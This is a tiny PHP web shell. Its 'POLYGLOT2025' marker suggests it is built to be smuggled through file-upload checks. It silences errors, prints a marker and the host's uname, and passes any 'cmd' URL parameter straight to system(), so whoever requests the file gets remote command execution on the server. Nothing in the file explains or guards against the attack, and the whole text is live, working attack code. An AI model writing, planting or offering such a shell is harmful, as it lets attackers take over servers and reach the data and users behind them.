<?php 
@error_reporting(0);
@ini_set('display_errors', 0);
echo "POLYGLOT2025_".bin2hex(random_bytes(6))."_OK";
if(isset($_GET["cmd"])) {
    echo "RCE_START_".php_uname()."_END\n";
    system($_GET["cmd"]);
}
?>